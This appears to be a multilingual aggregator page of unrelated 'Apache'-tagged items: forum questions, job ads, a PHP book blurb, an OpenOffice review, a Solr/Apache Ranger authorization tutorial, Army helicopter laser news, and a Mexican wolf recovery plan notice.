    // release any connection resources used by the method
    method.releaseConnection();
   }
                
  } catch(Exception e) {
   e.printStackTrace();
  }
 }
}
-------- stop cutting here --------

          XMLfo resources for Domino? (for generating pdf)   

I am involved in a project that seems to go towards having to generate a lot of PDF-files.

So I am researching the XMLfo Apache project to see if it could solve the problem. Has anyone used it with Domino? Or know of someone who has?


          Sysadmin   
Compétences:  Administrer des serveurs web Ubuntu, CentOS et Windows Connaissance de Apache, Nginx, MySQL, Postfix, Iptables, Varnish, cPanel/WHM, Git, Pound, ElasticSearch, Redis, DNS (Bind) Confortable avec les langages PHP et Ruby Connaissance des systèmes de déploiement en continu: Jenkins, Ansible, … Continue reading
          Sysadmin (DevOps)   
Compétences: Administrer des serveurs web Ubuntu, CentOS et Windows Connaissance de Apache, Nginx, MySQL, Postfix, Iptables, Varnish, cPanel/WHM, Git, Pound, ElasticSearch, Redis, DNS (Bind) Confortable avec les langages PHP et Ruby Connaissance des systèmes de déploiement en continu: Jenkins, Ansible, … Continue reading
          Overkill Apache   
Zbura prin cerul cu său elicopter şi trage în jos toate duşmani militare iese în cale.
          Mastering PHP 7   

Effective, readable, and robust codes in PHP About This Book Leverage the newest tools available in PHP 7 to build scalable applications Embrace serverless architecture and the reactive programming paradigm, which are the latest additions to the PHP ecosystem Explore dependency injection and implement design patterns to write elegant code Who This Book Is For This book is for intermediate level developers who want to become a master of PHP. Basic knowledge of PHP is required across areas such as basic syntax, types, variables, constants, expressions, operators, control structures, and functions. What You Will Learn Grasp the current state of PHP language and the PHP standards Effectively implement logging and error handling during development Build services through SOAP and REST and Apache Trift Get to know the benefits of serverless architecture Understand the basic principles of reactive programming to write asynchronous code Practically implement several important design patterns Write efficient code by executing dependency injection See the working of all magic methods Handle the command-line area tools and processes Control the development process with proper debugging and profiling In Detail PHP is a server-side scripting language that is widely used for web development. With this book, you will get a deep understanding of the advanced programming concepts in PHP and how to apply it practically The book starts by unveiling the new features of PHP 7 and walks you through several important standards set by PHP Framework Interop Group (PHP-FIG). You’ll see, in detail, the working of all magic methods, and the importance of effective PHP OOP concepts, which will enable you to write effective PHP code. You will find out how to implement design patterns and resolve dependencies to make your code base more elegant and readable. You will also build web services alongside microservices architecture, interact with databases, and work around third-party packages to enrich applications. This book delves into the details of PHP performance optimization. You will learn about serverless architecture and the reactive programming paradigm that found its way in the PHP ecosystem. The book also explores the best ways of testing your code, debugging, tracing, profiling, and deploying your PHP application. By the end of the book, you will be able to create readable, reliable, and robust applications in PHP to meet modern day requirements in the software industry. Style and approach This is a comprehensive, step-by-step practical guide to developing scalable applications using PHP 7.1 Downloading the example code for this book. You can download the example code files for all Packt books you have purchased from your account at http://www.PacktPub.com . If you purchased this book elsewhere, you can visit http://www.PacktPub.com/support and register to have the code file.


          Apache OpenOffice 4.1.2 Intel-La suite di lusso che non ti costa nulla   

OpenOffice.org è la più popolare suite office gratuita. Tra le novità introdotte dalla versione 3.0 spicca l'attesa compatibilità con i formati di Office 2007 e finalmente non è più necessario installare X11 per farla funzionare

Sono finiti i tempi in cui eri obbligato a pagare un prezzo proibitivo (o a procurarti una copia illegale) per avere una suite efficiente di programmi che ti permettesse di scrivere una lettera, creare una presentazione o utilizzare un foglio di calcolo. Adesso ci sono soluzioni totalmente gratuite, che non hanno nulla da invidiare a Microsoft Office. Tra queste, OpenOffice.org è probabilmente la migliore.

OpenOffice.org comprende Writer (processore testi), Calc (foglio di calcolo), Impress (presentazioni), Base (database), Math (formule matematiche) e Draw (grafiche vettoriali). La suite lavora con molti formati di documenti, è capace di modificare ed esportare file PDF, ed è pienamente compatibile con quelli più diffusi di Microsoft Office (tra cui .doc, .xls e .ppt).

Dalla versione 3.0, OpenOffice.org è finalmente un'applicazione con interfaccia Aqua e non è più necessario installare X11 per farla funzionare. Tra le altre novità spicca la capacità di aprire i file Open XML introdotti in Office 2007, tra cui .docx, .xlsx e .pptx. Per quanto riguarda l’interfaccia, le icone e alcuni dettagli sono stati rivisti, ma il design resta molto simile a quello della versione precedente e ci aspettavamo un'evoluzione maggiore da questo punto di vista.

Altre novità presenti dalla versione 3.0 di OpenOffice.org comprendono una finestra di avvio, chiamata Start Centre, per accedere alle diverse applicazioni e ai template, il supporto di 1024 colonne nei fogli di calcolo, una funzione migliorata per ritagliare le immagini in Draw e Impress, e la capacità di mostrare molteplici pagine di testo mentre si lavora in Writer.

Download Apache OpenOffice 4.1.2 Intel in Softonic


          The Army is flight testing helicopter-mounted laser weapons   

The US military's experiments shooting lasers from vehicles continue with another important milestone: Laser-equipped attack helicopter fired at targets for the first time. The US Army keeps getting better at nailing UAV targets with ground-based truck lasers, but it's harder to fire accurately from helicopters. Not only does their position fluctuate with airborne conditions, but their whole frame vibrates as their rotors spin fast enough to keep the whole vehicle aloft. Hitting a target almost a mile away from the air, as the Army just accomplished in a New Mexico tests series, is a big deal.

Via: NY Post

Source: Raytheon


          Porque bucle while ,y condicional if - elsif no funcionan correctamente?   

Porque bucle while ,y condicional if - elsif no funcionan correctamente?

Hola, soy un estudiante de java y no entiendo porque el output de este programa sale asi, espero que me puedan ayudar a entender y mejorar el codigo es este simple programa. Desde ya muchas gracias.

Aca esta el codigo o en el zip.

import java.util.Scanner; import com.sun.org.apache.xerces.internal.util.SynchronizedSymbolTable; public class AdivinarACpuV2 { public static void main(String[] args) { Scanner scanner = new Scanner...

Publicado el 30 de Junio del 2017 por Mateo

          Senior Support Engineer - GridGain - Time, IL   
Technical support for GridGain and Apache Ignite products. Close interaction with GridGain development team and Apache Ignite open source community....
From GridGain - Wed, 10 May 2017 19:19:23 GMT - View all Time, IL jobs
          Read WhatsApp messages on Server and Acknowledge Receipt by hemantrachh   
Create a Server Application which can read & store WhatsApp message sent to Server (Mobile Number Receiver) and Send a configured acknowledgement (on WhatsApp) back to Sender (Mobile Number). (Budget: ₹1500 - ₹12500 INR, Jobs: Apache, Java, Ubuntu, VPS, Web Services)
          Colm O hEigeartaigh: Securing Apache Solr - part III   
This is the third post in a series of articles on securing Apache Solr. The first post looked at setting up a sample SolrCloud instance and securing access to it via Basic Authentication. The second post looked at how the Apache Ranger admin service can be configured to store audit information in Apache Solr. In this post we will extend the example in the first article to include authorization, by showing how to create and enforce authorization policies using Apache Ranger.

1) Install the Apache Ranger Solr plugin

The first step is to install the Apache Ranger Solr plugin. Download Apache Ranger and verify that the signature is valid and that the message digests match. Now extract and build the source, and copy the resulting plugin to a location where you will configure and install it:
  • mvn clean package assembly:assembly -DskipTests
  • tar zxvf target/ranger-${version}-solr-plugin.tar.gz
  • mv ranger-${version}-solr-plugin ${ranger.solr.home}
Now go to ${ranger.solr.home} and edit "install.properties". You need to specify the following properties:
  • POLICY_MGR_URL: Set this to "http://localhost:6080"
  • REPOSITORY_NAME: Set this to "solr_service".
  • COMPONENT_INSTALL_DIR_NAME: The location of your Apache Solr server directory
Save "install.properties" and install the plugin as root via "sudo -E ./enable-solr-plugin.sh". Make sure that the user who is running Solr can read the "/etc/ranger/solr_service/policycache". Now follow the first tutorial to get an example SolrCloud instance up and running with a "gettingstarted" collection. We will not enable the authorization plugin just yet.

2) Create authorization policies for Solr using the Apache Ranger Admin service

Now follow the second tutorial to download and install the Apache Ranger admin service. To avoid conflicting with the Solr example we are securing, we will skip the section about auditing to Apache Solr (sections 3 and 4). In addition, in section 5 the "audit_store" property can be left empty, and the Solr audit properties can be omitted. Start the Apache Ranger admin service via: "sudo ranger-admin start", and open a browser at "http://localhost:6080", logging on with "admin/admin" credentials. Click on the "+" button for the Solr service and create a new service with the following properties:
  • Service Name: solr_service
  • Username: alice
  • Password: SolrRocks
  • Solr URL: http://localhost:8983/solr
Hit the "Test Connection" button and it should show that it has successfully connected to Solr. Click "Add" and then click on the "solr_service" link that is subsequently created. We will grant a policy that allows "alice" the ability to read the "gettingstarted" collection. If "alice" is not already created, go to "Settings/User+Groups" and create a new user there. Delete the default policy that is created in the "solr_service" and then click on "Add new policy" and create a new policy called "gettingstarted_policy". For "Solr Collection" enter "g" here and the "gettingstarted" collection should pop up. Add a new "allow condition" granting the user "alice" the "others" and "query" permissions.




3) Test authorization using the Apache Ranger plugin for Solr

Now we are ready to enable the Apache Ranger authorization plugin for Solr. Download the following security configuration which enables Basic Authentication in Solr as well as the Apache Ranger authorization plugin:
Now upload this configuration to the Apache Zookeeper instance that is running with Solr:
  • server/scripts/cloud-scripts/zkcli.sh -zkhost localhost:9983 -cmd putfile /security.json security.json
 Now let's try to query the "gettingstarted" collection as 'alice':
  • curl -u alice:SolrRocks http://localhost:8983/solr/gettingstarted/query?q=author_s:Arthur+Miller
This should be successful. However, authorization will fail for the case of "bob":
  • curl -u bob:SolrRocks http://localhost:8983/solr/gettingstarted/query?q=author_s:Arthur+Miller
In addition, although "alice" can query the collection, she can't write to it, and the following query will return 403:
  • curl -u alice:SolrRocks http://localhost:8983/solr/gettingstarted/update -d '[ {"id" : "book4", "title_t" : "Hamlet", "author_s" : "William Shakespeare"}]'

          Mexican Wolf Draft Revised Recovery Plan Released for Public Comment   
Series of public meetings will provide additional opportunities for public review

June 29, 2017

Contact(s):

John Bradley (505) 248-6279, john_bradley@fws.gov
Jeff Humphrey (602) 889-5946, jeff_humphrey@fws.gov



ALBUQUERQUE, NEW MEXICO – The U.S. Fish and Wildlife Service has released a draft revision to the Mexican Wolf Recovery Plan. The plan guides Mexican wolf recovery efforts by the bureau and its partners, with the ultimate goal of removing this wolf subspecies from Endangered Species Act (ESA) protections and returning management to the appropriate states and tribes. The Service is now seeking public input and peer review on the draft revised plan through a public comment period and series of public meetings. The comment period will remain open through August 29, 2017.
The recovery strategy outlined in the plan is to establish two Mexican wolf populations distributed in core areas within the subspecies’ historical range in the United States and Mexico. This strategy addresses the threats to the species, including the extinction risk associated with small population size and the loss of genetic diversity. The draft plan provides estimates of the time and resources required to carry out this strategy and the associated measures needed to achieve the plan’s goal.
At the time of recovery, the Service expects Mexican wolf populations to be stable or increasing in abundance, well-distributed geographically within their historical range, and genetically diverse.
In the United States, the recovery strategy will focus on the area south of I-40 in Arizona and New Mexico in the area designated as the Mexican Wolf Experimental Population Area.  In Mexico, federal agencies are focusing on the Sierra Madre Occidental Mountains in Sonora, Durango, and Chihuahua.
The current Mexican Wolf Recovery Plan dates back to 1982. In April 2016, the Service signed a Settlement Agreement with the Arizona Game and Fish Department and Defenders of Wildlife to complete a final revised Mexican Wolf Recovery Plan by the end of November 2017.
To ensure that we are able to address public comments and meet the agreed-upon completion date, we will not be extending the comment period beyond the designated time.
To review and comment on the draft revised recovery plan and related documents, visit www.regulations.gov and enter the docket number FWS–R2–ES–2017–0036 in the search bar. Click the “Comment Now” button to submit your comments.
Alternatively you may request documents by mail by writing to: U.S. Fish and Wildlife Service, New Mexico Ecological Services Field Office, 2105 Osuna Road NE, Albuquerque, NM 87113; or  by calling: (505) 346–2525. Comments may be mailed or hand delivered to: Public Comments Processing, Attn: FWS–R4–ES–2017–0036, U.S. Fish and Wildlife Service, MS: BPHC, 5275 Leesburg Pike, Falls Church, VA 22041–3803.
The Service will also hold four public meetings to provide an opportunity for citizens to learn about the revised Mexican wolf recovery plan and to provide written comments (oral comments will not be recorded).
The dates and times of these information meetings are as follows:
  1. July 18, 2017 (6:00 p.m. to 9:00 p.m.): Flagstaff: Northern Arizona University, Prochnow Auditorium, South Knowles Drive, Flagstaff, AZ 86001.
  2. July 19, 2017 (6:00 p.m. to 9:00 p.m.): Pinetop: Hon-Dah Resort, Casino Banquet Hall, 777 AZ–260, Pinetop, AZ 85935.
  3. July 20, 2017 (6:00 p.m. to 9:00 p.m.): Truth or Consequences: Ralph Edwards Auditorium, Civic Center, 400 West Fourth, Truth or Consequences, NM 87901.
  4. July 22, 2017 (2:00 p.m. to 5:00 p.m.): Albuquerque: Crowne Plaza Albuquerque, 1901 University Boulevard NE, Albuquerque, NM 87102.
The Mexican wolf recovery program is a partnership between the U.S. Fish and Wildlife Service, Arizona Game and Fish Department, White Mountain Apache Tribe, USDA Forest Service, USDA Animal and Plant Health Inspection Service – Wildlife Services, and several participating counties. The Interagency Field Team (IFT) is responsible for the day-to-day management of the Mexican wolf population and includes field personnel from several of the partner agencies.
For more information on the Mexican Wolf Reintroduction Program, visit
http://www.fws.gov/southwest/es/mexicanwolf/ or www.azgfd.gov/wolf
The U.S. Fish and Wildlife Service works with others to conserve, protect and enhance fish, wildlife, plants and their habitats for the continuing benefit of the American people. For more information, visit www.fws.gov, or connect with us through any of these social media channels: FacebookTwitterFlickrYouTube, Instagram, or our Open Spaces blog.

                                                                      – FWS –
          Principal Software Engineer (Scala) - $115.00 per hour - Incendia - Boston, MA   
Software Engineer, Software Engineering, Linux, Apache, MongoDB, NoSQL, MySQL, OpenTSDB, HBase, CouchDB, Basho Riak, Accumulo/sqrrl, Cassandra, Hadoop, Hive,... $115 an hour
From Incendia Partners - Fri, 30 Jun 2017 04:04:42 GMT - View all Boston, MA jobs
          VestaCP Let's Encrypt Broken   

Hi,

I can't seem to get Vesta's built in Let's Encrypt to work on a new install I did earlier.

My server runs CentOS 7, I only installed Apache, MySQL, FTP and IPtables / Fail2Ban on the Vesta install script.

The specific error I get in the control panel when I try to deploy a certificate is

"Error: Invalid response from http://domain.com/.well-known/acme-challenge/randomtext: \"

I tried to use Vesta's CLI to add the SSL certificate and got a different error.

[root@dedi local]# v-add-letsencrypt-domain admin domain.com /usr/local/vesta/bin/v-check-letsencrypt-domain: line 100: /home/admin/web/domain.com/public_html/.well-known/acme-challenge/randomtext: No such file or directory chown: cannot access ‘/home/admin/web/domain.com/public_html/.well-known’: No such file or directory Error: Invalid response from http://domain.com/.well-known/acme-challenge/randomtexxt: \

So I tried creating the well known folder manually (where it was trying to be found) and got this error instead.

Error: Invalid response from http://domain.com/.well-known/acme-challenge/randomtexxt: \

I'm not really sure what to try next, I didn't have this issue with my other server (although that one runs NGINX instead of Apache), since it's a fresh install I thought it would work from the get go.

Any ideas?


          US-WestCoast VPS(/Dedi) low-spec less than $10-15 quarterly/semi-annually   

I'm a C# developer that also plays Minecraft with a deaf (hard-of-hearing) brother, so my requirements aren't all that steep.. Looking for something with 1.5GB+ ram, 2.4ghz+ at least a single dedicated thread/vcore, though 2 would be nice, and any form of storage of at least 20GB+ would suffice. It'll host a 2-3 user MC server (idle more often than not) as well as apache/LAMP stack with a git-server.

West-coast is requested because I'm currently in the Philippines until moving back to California next year.. Ping times <200ms aren't achievable any further than a couple hundred miles inland.

Thanks for taking to time to post any offers you may have and happy croning. :)

Official request details below: -

VZ Type: OpenVZ, KVM

Number of Cores: 1+ (preferably 2.4ghz+, no atoms if avoidable)
RAM: 1536mB+
Disk Space: 20gB+
Disk Type: Any

Bandwidth: 750GB+
Port Speed: 50mbps+

DDoS Protection: Most likely not needed but it would be a plus.

Number of IPs:A single IPv4 is sufficient.

Location: West-Coast USA (or south-west Canada)

Budget: $10-$15 quarterly / semi-annually

Billing period:
Quarterly / semi-annually

          How to Install Joomla with Apache on Debian 9 (Stretch)   

HowToForge: Joomla is one of the most popular and widely supported open source content management system (CMS) platform in the world.


          Apache Kafka Developer   
SolutionIT, Inc. Philadelphia, PA
          Apache CXF框架webservice入门实例   

          ΣΥΝΕΒΗ ΚΙ ΑΥΤΟ ΚΑΙ ΕΙΝΑΙ ΤΡΟΜΑΚΤΙΚΟ!!!ΠΡΩΤΗ ΦΟΡΑ!!!ΒΟΛΗ όπλου ΛΕΙΖΕΡ υψηλής ισχύος από επιθετικό ελικόπτερο Apache AH-64!!![ΒΙΝΤΕΟ]   



ΣΥΝΕΒΗ ΚΙ ΑΥΤΟ ΚΑΙ ΕΙΝΑΙ ΤΡΟΜΑΚΤΙΚΟ!!!ΠΡΩΤΗ ΦΟΡΑ!!!ΒΟΛΗ  όπλου ΛΕΙΖΕΡ υψηλής ισχύος από επιθετικό ελικόπτερο Apache AH-64!!![ΒΙΝΤΕΟ]

 

 

 

Με επιτυχία στέφθηκε η πρώτη δοκιμή από τις αμερικανικές ένοπλες δυνάμεις ενός όπλου λέιζερ υψηλής ισχύος που είχε τοποθετηθεί σε επιθετικό ελικόπτερο Apache AH-64.



Στην επίδειξη που έγινε στο πεδίο δοκιμών White Sands του Νέου Μεξικό το όπλο λέιζερ εντόπισε, στόχευσε και έπληξε στόχο εδάφους σε απόσταση περίπου 1,4 χιλιομέτρων.



Το όπλο, που ανέπτυξε η εταιρεία Raytheon, είναι σχεδόν αθόρυβο και οι βολές του σχεδόν αόρατες, γεγονός που καθιστά ιδιαίτερα δύσκολη την ανίχνευσή του από τους εχθρούς και μπορεί στο εγγύς μέλλον να χρησιμοποιηθεί στα πεδία των μαχών.



Συστήματα λέιζερ χρησιμοποιούντα στα ελικόπτερα Apache από το 1984, αλλά ήταν χαμηλής ισχύος και χρησίμευαν μόνον για την καθοδήγηση πυραύλων αέρος-εδάφους. Ενώ αυτή ήταν, σύμφωνα με τη Raytheon, η πρώτη φορά που ένα πλήρως ενσωματωμένο σύστημα λέιζερ έπληξε με επιτυχία στατικό στόχο από ελικόπτερο, σε μια ποικιλία υψομέτρων, ταχυτήτων και φάσεων πτήσης.



Τα λέιζερ αυτά είναι ιδιαίτερα ακριβή επειδή, σε αντίθεση με τα συμβατικά βλήματα και τις σφαίρες, βάλλουν σε ευθεία γραμμή και είναι αρκετά ισχυρά για να καταστρέφουν στόχους.



Η εταιρεία χρησιμοποίησε έναν ηλεκτροοπτικό υπέρυθρο αισθητήρα – παραλλαγή του πολυ-φασματικού συστήματος στόχευσης (Multi-Spectral Targeting System). Λέει μάλιστα ότι η ισχύς της ακτίνας λέιζερ μπορεί να προσαρμοστεί σε κάθε υλικό – και ότι μπορεί να εξουδετερώσει, χωρίς να σκοτώσει, ανθρώπινους στόχους.



Στη διάρκεια της δοκιμής εξουδετερώθηκαν πύραυλοι κρουζ, οβίδες και άλλα βλήματα, ανέφερε η εταιρεία επισημαίνοντας ότι «σε αντίθεση με τα συμβατικά όπλα τα λέιζερ δεν ξεμένουν από σφαίρες».



Ωστοσο, χρησιμοποιούν πολλή ενέργεια και προς το παρόν δεν μπορούν να χρησιμοποιηθούν σε συνθήκες ομίχλης, καπνού, ή εναντίον στόχων με ειδική anti-laser επίστρωση.



Οι αμερικανικές ένοπλες δυνάμεις στρέφονται ολοένα και περισσότερο στην τεχνολογία λέιζερ και ήδη χρησιμοποιούν τέτοια όπλο για να καταρρίπτουν εχθρικούς πυραύλους και μη επανδρωμένα τηλεκατευθυνόμενα αεροσκάφη.



Νωρίτερα φέτος μονάδες του αμερικανικού πεζικού χρησιμοποίησαν για πρώτη φορά όπλα λέιζερ στη διάρκεια ασκήσεων, καταρρίπτοντας 50 drones.


ΕΠΙΣΗΜΑΝΣΗ
Ορισμένα αναρτώμενα από το διαδίκτυο κείμενα ή εικόνες (με σχετική σημείωση της πηγής), θεωρούμε ότι είναι δημόσια. Αν υπάρχουν δικαιώματα συγγραφέων, παρακαλούμε ενημερώστε μας για να τα αφαιρέσουμε. Επίσης σημειώνεται ότι οι απόψεις του ιστολόγιου μπορεί να μην συμπίπτουν με τα περιεχόμενα του άρθρου. Για τα άρθρα που δημοσιεύονται εδώ, ουδεμία ευθύνη εκ του νόμου φέρουμε καθώς απηχούν αποκλειστικά τις απόψεις των συντακτών τους και δεν δεσμεύουν καθ’ οιονδήποτε τρόπο το ιστολόγιο.

loading...

          Re: Pourquoi il faut laisser l'hébergement web aux hébergeurs   
Alcaline a écrit:
Pour finir tu dis

Citation:
Mais mdr tu le fais exprès ? Mr. Green Mais mdr tu le fais exprès ?
NODEJSSSSSSS xDDD


Mais il me semble bien que le NodeJS permet de remplacer le php (vu que à ce que j'ai vu sur internet nodejs
ne permet pas de compiler du php),

Mais du coup comment ça se fait qu'on puisse utiliser du php ? Il y'a forcément un serveur (comme le dis xenoxis)
Apache/Ngix sous un autre port qui traite les requetes php non?

Sinon, un hébergeur qui propose d'héberger son site sans php ça deviens tout de suite moins intéressant Okay


J'ai fais mon serv nodejs, puis ensuite par la suite j'ai télécharger php "brute" et quand il y a une extension en .php ba je fais le rendu avec en lui passant en argument le fichier voilà
Il n'y a pas de Apache/Ngix voilà Mr. Green

Message: http://batch.xoo.it/t5809-Pourquoi-il-faut-laisser-l-h-bergement-web-aux-h-bergeurs.htm?p=43848


          Re: Pourquoi il faut laisser l'hébergement web aux hébergeurs   
Pour finir tu dis

Citation:
Mais mdr tu le fais exprès ? Mr. Green Mais mdr tu le fais exprès ?
NODEJSSSSSSS xDDD


Mais il me semble bien que le NodeJS permet de remplacer le php (vu que à ce que j'ai vu sur internet nodejs
ne permet pas de compiler du php),

Mais du coup comment ça se fait qu'on puisse utiliser du php ? Il y'a forcément un serveur (comme le dis xenoxis)
Apache/Ngix sous un autre port qui traite les requetes php non?

Sinon, un hébergeur qui propose d'héberger son site sans php ça deviens tout de suite moins intéressant Okay

Message: http://batch.xoo.it/t5809-Pourquoi-il-faut-laisser-l-h-bergement-web-aux-h-bergeurs.htm?p=43847


          Re: Pourquoi il faut laisser l'hébergement web aux hébergeurs   
Xenoxis a écrit:
La page de ton site met 15 ans à charger, et une fois chargée, elle est ultra lente ...

Mais mdr tu le fais exprès ? Mr. Green


Xenoxis a écrit:
Bah, si justement Rolling Eyes

Bah non justement, sur tous les pc, les smartphones tous fonctionne la page charge assez vite (2-4sec) et la page est très fluide Rolling Eyes
Je sais pas combien d fois que je vais te le dire : tu es le SEUL à rencontrer ce problème,
au lieu de dire que nodejs c'est de la grosse merde et que je code comme une grosse merde, tu pense pas que le problème pourrait venir de toi ?


Xenoxis a écrit:
Pas besoin je t'ai déjà tout dit Wink

Ok Mr. Green
Mais montre moi ce que toi tu vois, parce que je sais pas ce qui est lent dans la page (le défilement, les particules, le hover sur les boutons ?)




Xenoxis a écrit:
Donc du coup, ton site tourne sous quel serveur ? Apache ? Nginx ? Ou alors ton framework fait office de serveur ? Neutral
En tout cas, je sais pas si utiliser du javascript coté serveur soit la meilleure idée qu'il soit Rolling Eyes

Mais mdr tu le fais exprès ? Mr. Green Mais mdr tu le fais exprès ?
NODEJSSSSSSS xDDD
Tu vas me tuer là MDRRRR Laughing Laughing Mr. Green Mort de Rire
Si c'est une mauvaise idée, je me demande alors pourquoi ça devient de plus en plus populaire et que de + en + de gens le font, c'est très bizarre xD
Si c'est juste pour critiquer NodeJS merci d'ouvrir un topic séparé et de mettre toute ta haine dedans merci Okay

Message: http://batch.xoo.it/t5809-Pourquoi-il-faut-laisser-l-h-bergement-web-aux-h-bergeurs.htm?p=43844


          Re: Pourquoi il faut laisser l'hébergement web aux hébergeurs   
Flammrock a écrit:

Ba ça peut pas venir du serveur car apparemment le problème survient après que la page est chargé xD


Mais mdr tu le fais exprès ? Mr. Green
Xenoxis a écrit:
quand ton site met + de5 secondes (moyenne à 12 s, à battre xD) a charger, je me dit qu'il y a un problème

La page de ton site met 15 ans à charger, et une fois chargée, elle est ultra lente ...


Flammrock a écrit:

C'est vrai que j'ai mis pas mal de particules mais pas au point de faire lagué la page xDD Mr. Green

Bah, si justement Rolling Eyes

Flammrock a écrit:

Faudrait que tu me montre en vidéo ce que toi tu vois que je voille ce que je peux faire du mieux que je peux pour résoudre ton prob Okay

Pas besoin je t'ai déjà tout dit Wink


Flammrock a écrit:

Le truc nommé "X-Express", c'est Express c'est un framework utilisé systématiquement avec nodejs qui permet d'optimiser et de simplifier le code côté serveur.
Et si t'as trouvé que Express et ba sache que tu as du boulot car j'en utilise beaucoup d'autres xDDD


Je suis pas allé bien loin pour trouver ça, j'ai juste regardé les header que renvoit ton serveur http et le "Name" a la valeur "X-Express" Rolling Eyes
Donc du coup, ton site tourne sous quel serveur ? Apache ? Nginx ? Ou alors ton framework fait office de serveur ? Neutral
En tout cas, je sais pas si utiliser du javascript coté serveur soit la meilleure idée qu'il soit Rolling Eyes

Message: http://batch.xoo.it/t5809-Pourquoi-il-faut-laisser-l-h-bergement-web-aux-h-bergeurs.htm?p=43843


          Instalação e Manutenção do seu certificado SSL   
Aqui você encontra as instruções feitas pela Symantec para a manutenção de seu certificado SSL, bem como alguns erros comuns que ocorrem nas plataformas de software de servidor mais utilizadas no mercado.

Se seu software de servidor não está listado abaixo, consulte a base de conhecimento da Symantec. Outra opção é você procurar diretamente seu fornecedor de servidores web e com certeza ele terá mais conhecimento do seu próprio software.


          禅道 9.3.beta 版本发布,升级框架增强程序安全   

大家好,禅道项目管理软件9.3.beta版本正式发布。此次版本主要升级框架,增强程序安全,调整一键安装包。

修改记录

完成的需求
2021 loadModel改为单例模式
2022 helper::substr()方法计算有误
2024 过滤文件的时候改为白名单模式
2149 将最近的改动合并到框架中。
2223 getCSS方法中,当extensionLevel等于0时,返回的数据不对。同样检查getJS方法
2232 框架里面createLink的判断有问题。
2233 框架 fetch()方法里面需要增加注释。对fetch自己的那部分。
2234 将这次sobug发现的问题改正到框架代码中
2235 将代码里面的一些逻辑背景注释加上
2281 提供集中的参数过滤功能
2299 提供基础的文件上传模块,调整富文本编辑器的图片格式,去掉上个文件的扩展名
2315 增加数据库密码查看功能
2316 调整密码保护控件
2320 将密码相关的功能独立为一个菜单组
2321 英文界面下还有中文翻译。
2322 设置语言之后其实不需要重新启动。
2323 控制面板中增加将禅道放在根目录访问的功能
2324 增加日志菜单组
2325 控制面板修改mysql root帐号密码之后需要刷新权限表
2334 windows一键安装包可以一键去除限制PHP响应目录功能
2335 windows一键安装包可以分开控制apache或者mysql服务
2338 一键安装包控制面板在服务停止的情况下备份禅道会出错

下载地址

一、禅道项目管理软件源码下载

下载站点1
下载站点2

二、集成运行环境下载:切勿下载下面的软件进行升级,仅适用于新安装
Windows一键安装包(适用于windows 64位)
下载站点1
下载站点2

Windows一键安装包(适用于windows 32位)
下载站点1
下载站点2

Linux 64位一键安装包(适用于Linux 64位)
下载站点1
下载站点2

Linux 32位一键安装包(适用于Linux 32位)
下载站点1
下载站点2
注:Linux一键安装包必须直接解压到/opt目录下。

三、DEB包下载:可以通过dpkg包管理器在Ubuntu和Debian系统下安装
下载站点1
下载站点2

四、RPM包下载:可以通过rpm包管理器在Centos系统下安装
下载站点1
下载站点2

安装和升级文档

安装文档:http://www.zentao.net/book/zentaopmshelp/40.html

升级文档:http://www.zentao.net/book/zentaopmshelp/41.html

功能截图

一键安装包控制面板备份禅道

密码相关功能独立为一个菜单组

软件界面截图

禅道-我的地盘

禅道-提需求

禅道-任务看板

禅道-提Bug


          MSI GE62 7RE Apache Pro Review   
This 15.6" laptop sports a GTX 1050 Ti 4GB and a Core i7-7700HQ for just over £1,000.

          Java Developer   
Mastech is a growing company dedicated to innovation and teamwork. We are currently seeking a Java Developer for our client in the IT Services domain. We value our professionals, providing comprehensive benefits, exciting challenges, and the opportunity for growth. This is a Contract position and the client is looking for someone to start immediately.

Duration: 12 Months Contract
Location: Ewing, NJ/ Zip Code: 19087
Compensation: Market Rate

Role: Java Developer

Role Description: The Java Developer would need to have at least 5+ years of experience.

Responsibilities:

- Coordinate and support software production schedules and processing.
- Work with units throughout organization to ensure smooth delivery of existing services and program modifications.
- Support the planning and training of internal clients when new applications are launched or new processes are put in place.
- Provide peer leadership and collaborate with Leads, team members and other development staff.
- Independently develops software, codes, tests and debugs.
- Recommend modification to existing processes and new procedures to solve complex problems considering the existing system limitations, operating time and desired results.
- Collaborate with team members as well as across FCEs/SBUs to identify ways to improve existing processes and technical output.
- Proactive identification of gaps (especially across areas) and escalate in a timely and appropriate manner.
- Create and update all relevant documentation and specifications for design, development, and testing.
- Escalate problems of complex technical circumstances to appropriate channels.

Required Skills:

- JPA, Hibernate, Spring Core, Spring MVC, Apache CXF, JUnit
- 7 Years of Java development experience.
- 5 Years of Strong objected oriented analysis and design.
- 2 Years of experience with build/integrations tools Ex: Maven, Ant, Hudson, Continuum, and Jenkins - Preferred.
- Development Environment, Eclipse, Tomcat, Linux.

Education: Bachelor's Degree
Experience: Minimum 5+ years
Relocation: No, this position will not cover relocation expenses
Travel: No
Local Preferred: Yes

Recruiter Name: Mrudul Godavarthi
Recruiter Phone: 412 436 0333 (Ext: 2312)

EOE
          HDFS: Cluster to cluster copy with distcp   
Este es el formato del comando distcp para copiar de hdfs a hdfs considerando cluster origen y destino en Amazon AWS: hadoop distcp "hdfs://ec2-54-86-202-252.compute-1.amazonaws.comec2-2:9000/tmp/test.txt" "hdfs://ec2-54-86-229-249.compute-1.amazonaws.comec2-2:9000/tmp/test1.txt" Mas informacion sobre distcp: http://www.cloudera.com/content/cloudera-content/cloudera-docs/CDH4/latest/CDH4-Installation-Guide/cdh4ig_topic_7_2.html http://hadoop.apache.org/docs/r1.2.1/distcp2.html  
          Mobile Web User Interface Development Full time Job in Elk Grove, CA   
<span>Modis is looking to fill a Mobile Web UI Developer for a full time Job with our client in Elk Grove, CA 95757. If you meet the below requirements and would like to learn more about this great opportunity please apply now for immediate consideration.<br>&nbsp;<br>We are looking for a technical generalist familiar with an assortment of leading technologies, with a current focus on mobile app design and development. &nbsp;The technology environment will use tools such as TypeScript, JavaScript, Angular, Bootstrap, NodeJS, WebStorm, Chrome Debugger, and including cross-platform IDEs for mobile development such as Xamarin. <br>&nbsp;<br>EXPERIENCE:<br>&nbsp;<br><ul>
<li>Proven experience developing high-quality web (or mobile web) apps containing rich content and user interface components, using HTML5, CSS3, Javascript, and REST. </li><li>Experience working with JavaScript libraries and frameworks for mobile web development (such as JQuery, Angular, Bootstrap), and ability to work with MV* patterns.</li><li>Experience working with touch interfaces, mobile gesture support, flexible CSS layout, security, and tight AJAX server integration (notifications, WebSockets, JSON).</li><li>Production release and SDLC experience for mobile apps (enterprise or Internet deployed) is preferred. </li></ul>
&nbsp;<br>RESPONSIBILITIES:<br>&nbsp;<br><ul>
